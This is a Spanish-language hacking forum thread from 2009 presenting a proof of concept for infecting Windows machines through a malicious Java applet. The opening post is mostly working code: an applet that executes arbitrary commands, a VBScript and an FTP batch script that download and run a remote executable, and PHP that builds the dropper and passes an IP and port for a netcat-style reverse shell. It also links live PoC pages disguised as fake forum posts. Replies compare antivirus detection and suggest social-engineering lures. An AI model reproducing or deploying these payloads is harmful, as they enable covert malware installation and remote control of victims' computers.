elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [POC] Infección Mediante Java Applet (y VBScript)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: [POC] Infección Mediante Java Applet (y VBScript)  (Leído 30,827 veces)
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
[POC] Infección Mediante Java Applet (y VBScript)
« en: 1 Enero 2009, 22:50 pm »

[POC] Infección Mediante Java Applet (y VBScript)

Fuente milw0rm.com
Autor: AnalyseR

POC y post realizado por Wofo y Hacker_Zero para www.eduhack.es

Bueno, muchos recordarán un post dónde se explicaba como hacer un fake de una web que nos pedía un componente flash y había un link hacia un *.exe.

Bueno pues mediante la ejecución de un Applet en Java y un script en VBScript o Batch, es posible descargar y ejecutar un programa remoto en un pc tan sólo con 1 click, para decir que se confía en el applet que se intenta ejecutar (el cual sale en todos los applets como pueden ser juegos y demás).

Empezamos con el Applet
Lo primero será compilar el siguiente código en Java:

Código
  1. import java.applet.*;
  2. import java.awt.*;  
  3. import java.io.*;
  4. public class skata extends Applet
  5. {
  6.     public void init()
  7.     {
  8.          Process f;
  9.          String first = getParameter("first");
  10.  
  11.           try
  12.           {
  13.                f = Runtime.getRuntime().exec(first);
  14.           }
  15.  
  16.           catch(IOException e)
  17.           {
  18.                e.printStackTrace();
  19.           }
  20.      }
  21. }

Éste código ejecuta un en el pc remoto lo que se le pase como parámetro. El Applet puede ser utilizado de la suguiente manera desde un documento html:

Código
  1. <applet width='1' height='1' code='Nombre-clase-applet.class' archive='Nombre-Applet.jar'>
  2.  
  3. <param name='first' value='cmd.exe /c msg * Hola Mundo!'>
  4.  

Como véis nos dá la posibilidad de ejecutar comandos de consola en un pc remoto con S.O Windows. Pero iremos un paso más allá, y descargaremos un archivo al pc, como podemos hacer ésto? Pues podemos crear códigos usando Scripting, ya sea en Batch usando ftp o en VBScript.

Para crear el archivo VBS utilizamos Streams de salida en Batch:

Código:
cmd.exe /c echo Comando en VBS >>C:\Archivo.vbs

El siguiente código en VBScript descarga un Archivo binario  y lo ejecuta:

Código
  1. Const adTypeBinary = 1  
  2. Const adSaveCreateOverWrite = 2  
  3. Dim BinaryStream  
  4. Set BinaryStream = CreateObject("ADODB.Stream")  
  5. BinaryStream.Type = adTypeBinary  
  6. BinaryStream.Open  
  7. BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))  
  8. BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite  
  9. Function BinaryGetURL(URL)  
  10. Dim Http  
  11. Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")  
  12. Http.Open "GET", URL, False  
  13. Http.Send  
  14. BinaryGetURL = Http.ResponseBody  
  15. End Function  
  16. Set shell = CreateObject("WScript.Shell")  
  17. shell.Run "cmd.exe /c C:\archivo.exe"
  18.  

Su funcionamiento es muy sencillo:

Código:
Codigo.vbs http://www.pagina.com/archivo.exe C:\archivo.exe

Tambien se podría hacer sin necesidad de ningún archivo vbs ejecutando el ftp de la línea de comandos, aunque seguimos con el caso de vbs que es el ejemplo que puso el autor y es mas "general".

Aquí un ejemplo de como descargar el archivo usando ftp desde la shell:

Código:
@echo off
echo usuario@nombreftp.com>C:\datos.txt
echo contraseña>>C:\datos.txt
echo cd /path>>C:\datos.txt
echo pwd>>C:\datos.txt
echo binary>>C:\datos.txt
echo get archivo.exe>>C:\datos.txt
echo bye>>C:\datos.txt
echo quit>>C:\datos.txt
ftp -s:C:\datos.txt nombreftp.com
start archivo.exe

El archivo descargado (en nuestro ejemplo [al final del post]) lo único que nos da es una advertencia y la ip y el puerto que le pasamos por php.
Lo de la ip y el puerto funciona gracias a un sencillo código PHP:

Código
  1. <?php
  2. if(isset($HTTP_GET_VARS["ip"])) {
  3. $ip = $HTTP_GET_VARS["ip"];
  4. }
  5. else $ip = 127.0.0.1;
  6.  
  7. if(isset($HTTP_GET_VARS["puerto"])) {
  8. $puerto = $HTTP_GET_VARS["puerto"];
  9. }
  10. else $port = 7173;
  11.  
  12. echo '
  13. <applet width="1" height="1" code="nombreclaseapplet.class" archive="nombreapplet.jar">
  14. <param name="first" value="cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> C:\windows\apsou.vbs & echo Http.Open \"GET\", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> C:\windows\apsou.vbs & echo shell.Run \"C:\windows\update.exe -d -e cmd.exe '.$ip.' '.$puerto.'\" >> C:\windows\apsou.vbs">
  15. </applet>';
  16. ?>
  17.  

Con este código lo que hacemos es editar el código VBs para que ejecute el archivo descargado, pasando como parámetros la ip y el puerto introducidos en la URL.

Para que tengan una mejor idea de lo que digo les dejo el código en C++ del programa que se descarga en el ejemplo:

Código
  1. #include <iostream>
  2.  
  3.  
  4.  
  5. using namespace std;
  6.  
  7.  
  8.  
  9. int main(int argc, char* argv[]) {
  10.  
  11. cout << "Este ejecutable puede ser reemplazado un troyano, backdoor, virus, netcat, etc." << endl;
  12.  
  13.    cout << "Por lo tanto nunca hay que fiarse de applets sin firmas certificadas" << endl;
  14.  
  15.    cout << "La ip introducida mediante PHP es " << argv[1] << endl;
  16.  
  17.    cout << "El puerto introducido mediante PHP es " << argv[2] << endl;
  18.  
  19. }
  20.  

Las variables de la url en php se pasan al VBS. Al ejecutar el VBS éste ejecuta nuestro archivo.exe con los parámetros.

Pudiendo hacer esto, las posibilidades que ofrece este método son infinitas... Se puede mandar cualquier programa y ejecutarlo sin que el usuario sospeche nada, imagina que mandamos un netcat con los parámetros para que nos pase una shell, o que mandamos un troyano o lo que sea. Nuevamente digo, las posibilidades son infinitas.

Les dejamos una prueba de concepto en el siguiente link:

http://wofo.x10hosting.com/hacking/JAVA/POCapplet/index.php?board=127.0.0.1&topic=7765

Otra poc usando ftp desde la línea de comandos, sin necesidad de vbs:

http://wofo.x10hosting.com/hacking/JAVA/POCapplet/indexftp.php?board=127.0.0.1&topic=7765

Como verán, es un fake muy convincente de un post del foro (fake hecho por HACKER_ZERO).
Lo que hace es, cuando ejecutan el applet, crea el codigo en .vbs y lo ejecuta, el cual se encarga de descargar el archivo.exe y ejecutarlo con los parámetros. Ambos archivos se descargan en C:\Windows como apsou.vbs y update.exe.

Testeado usando netcat en:

- Firefox  3.05, Windows XP SP3 con Firewall de Windows, NOD32 y su Firewall activo.

- IE Windows XP SP3 con Firewall de Windows, NOD32 y su Firewall activo.

- Firefox  3.05, Windows XP SP2 con Firewall de Windows, Avast y su Firewall activo. (Gracias Shell Killer  ;))



Cualquier duda o pregunta la recibimos con los brazos abiertos.

Salu2
« Última modificación: 2 Enero 2009, 21:19 pm por Hacker_Zero » En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Wofo

Desconectado Desconectado

Mensajes: 168


Ver Perfil
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #1 en: 1 Enero 2009, 23:13 pm »

 ::) Esperamos que les guste.

Salu2
En línea

Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #2 en: 1 Enero 2009, 23:16 pm »

XP SP2  IE7/FF3.5 works. Obvio como siempre el KIS detecta el script y la creacion del archivo.



Ademas de tener que permitir la ejecucion desde el navegador obviamente, pero bueno un fakegame y va de perlas.
En línea

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #3 en: 1 Enero 2009, 23:20 pm »

Hm el kis como siempre, jeje, lo detectará por heurística, el script no daba alerta como resultado en novirusthanks. Supongo kis será el único, yo tengo nod32 y ni se percata.

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #4 en: 1 Enero 2009, 23:25 pm »

No, mas que heuristica es las reglas de las aplicaciones, la proactiva y demas. Lo "malo" con el KIS es que te pone bloquear como recomendado a lo digitalmente desconocido y bueno eso lleva a que mas de uno le ponga bloquear sin importar su nivel de conocimientos. En anteriores versiones si que te ponia solo "autorizar" o bloquear" sin mas, y ahi si todo el mundo si veia un nombre medio windowsero le daba autorizar. Si te fijas, el script pasa al grupo de restriccion minima y no me pregunto si queria ponerlo ahi, si me alerto que se creaba y se lo ponia en "restriccion minima", pero no me dio chances de elegir y eso ya es bastante con el KIS. Ahora pruebo con Vista a ver que pasa, asumo que el UAC saltara.

PD: El nod nunca se percata de nada =D.


Felicitaciones por el POC  :)
« Última modificación: 1 Enero 2009, 23:31 pm por Littlehorse » En línea

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #5 en: 1 Enero 2009, 23:31 pm »

Si, sería interesante probarlo en vista ya que no tuve ocasión de hacerlo. Gracias, pero la idea es de AnalyseR y que lo posteó en milw0rm, nosotros hemos adaptado la info a nuestra manera y hemos añadido lo de los parámetros usando php. Haciendolo así, incluso se puede montar una web que acepte los parametros ip y puerto para netcat (index.php?ip=127.0.0.1&puerto=2000), pero no lo hemos hecho ya que no lo veíamos conveniente, la cantidad de lammers que lo usarían comprometiendo la seguridad de muchos pc's. Así el que lo haga tiene que compilar los códigos y entenderlos  ;).

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #6 en: 1 Enero 2009, 23:35 pm »

Ni hablar, 100% de acuerdo, este tipo de cosas siempre es mejor mostrar como funciona pero no dejarlas servidas en bandeja.

Termino de probar unas cosillas y comento que pasa en Vista.

Un abrazo!
En línea

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #7 en: 2 Enero 2009, 01:57 am »

Hm pero ahora que lo pienso, si lo que detecta la heurística es la creación del vbs, mediante /c se pueden descargar los archivos de un ftp con acceso anónimo sin necesidad de crear ningún script, aunque no estoy seguro, me creo un ftp y les cuento, jaja.

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #8 en: 2 Enero 2009, 02:15 am »

El KIS detecta el funcionamiento del vbs, no la creación de este  :rolleyes:
Detecta hasta la descarga de un archivo en texto plano, un *.exe ni hablar, así que la efectividad de este método sigue dependiendo de "ingenieria social"  :P

[HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ?

Saludos
« Última modificación: 2 Enero 2009, 02:17 am por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: [POC] Infección Mediante Java Applet y VBScript
« Respuesta #9 en: 2 Enero 2009, 02:36 am »

Obviamente que detecta el funcionamiento, pero a mi me lo paso al grupo de restriccion minima sin consultarme =P.
Y lo de la ingenieria social esta claro, si ese Applet no es un fake porno game online o el proveedor no tiene un nombre ingenioso muy pocos caerian.
En línea

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
Páginas: [1] 2 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Infeccion de dispositivos USBs mediante archivos LNK
Análisis y Diseño de Malware
Jaixon Jax 4 6,973 Último mensaje 1 Diciembre 2010, 02:25 am
por Stelio Kontos
Ejemplo de infección mediante TLS Callbacks
Análisis y Diseño de Malware
The Swash 0 2,323 Último mensaje 16 Mayo 2011, 02:16 am
por The Swash
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines